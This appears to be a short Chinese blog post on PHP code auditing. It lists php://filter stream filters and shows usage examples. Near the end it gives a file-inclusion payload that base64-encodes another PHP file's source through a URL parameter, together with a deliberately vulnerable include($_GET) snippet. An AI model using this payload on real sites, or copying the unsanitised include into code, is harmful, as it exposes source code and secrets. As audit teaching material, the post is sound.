[php代码审计] php://filter
时间:2017-07-27 00:56:08
收藏:0
阅读:2339
筛选过滤应用:
1、 字符串过滤器:
- string.rot13 对字符串执行ROT13转换
- string.toupper转换为大写
- string.tolower 转换为小写
- string.strip_tags去除html和php标记
2、 转换过滤器:
- convert.base64-encode & convert.base64-decode :base64编码/解码
- convert.quoted-printable-encode & convert.quoted-printable-decode:将 quoted-printable 字符串转换为 8-bit 字符串
3、 压缩过滤器:
- zlib.deflate和 zlib.inflate
- bzip2.compress和 bzip2.decompress
4、 加密过滤器:
- mcrypt.tripledes和mdecrypt.tripledes等
readfile("php://filter/read=string.toupper/resource=http://www.example.com");//将www.example.com中的内容转换为大写后输出 file_put_contents("php://filter/write=string.rot13/resource=example.txt","Hello World");//将字符串”hello world”经过rot13编码后写入example.txt
例子:
url:
/index.php?a=php://filter/read=convert.base64-encode/resource=index2.php
index.php:
<?php include($_GET[‘a‘]); ?>
结果如图:
https://www.leavesongs.com/PENETRATION/php-filter-magic.html
评论(0)